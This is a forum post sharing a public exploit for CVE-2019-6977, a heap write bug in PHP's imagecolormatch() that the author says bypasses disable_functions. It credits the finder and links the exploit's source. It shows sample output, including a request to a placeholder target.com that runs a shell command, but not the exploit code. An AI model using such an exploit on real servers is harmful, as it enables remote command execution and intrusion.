Jump to content
Nytro

imagecolormatch() OOB Heap Write exploit

Recommended Posts

imagecolormatch() OOB Heap Write exploit

Info

My binary exploit for CVE-2019-6977. Bug found by Simon Scannell from RIPS.

PHP bug is here. Helps you bypass PHP's disable_functions INI directive.

I commented a lot to help people that are new to binary PHP exploitation. Hope this helps.

Output

GET http://target.com/exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
Nenuphar.ce: 0x7fe834a10018
Nenuphar2.ce: 0x7fe834a10d70
Nenuphar.properties: 0x7fe834a01230
z.val: 0x7fe834aaea18
Difference: 0xad7e8

Exploit SUCCESSFUL !

 

Sursa: https://github.com/cfreal/exploits/tree/master/CVE-2019-6977-imagecolormatch

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...